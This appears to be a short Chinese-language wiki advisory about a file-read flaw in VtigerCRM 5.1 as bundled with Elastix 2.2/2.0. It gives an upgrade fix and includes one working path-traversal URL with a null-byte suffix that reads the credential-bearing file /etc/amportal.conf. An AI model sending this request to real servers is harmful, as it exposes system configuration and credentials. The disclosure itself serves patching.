Asterisk 重大漏洞

  • You do not have permissions to view this page - please try logging in.
內容表格
  1. 1. Issue #1

版本為 20:08, 28 Jul 2026

到這個版本。

返回到 版本存檔.

查閱目前版本

Issue #1

影響的系統:VtigerCRM 5.1 (包含 Elastix 2.2/2.0)

漏洞的起因:PHP 檔設計漏洞

漏洞的危害:
攻擊者只要瀏覽以下特定網址,就能讀取所有系統檔案的內容。

https://your.elastix.server/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/amportal.conf%00

解決方案:升級 Elastix 至 2.3.x
 

Powered by MindTouch Core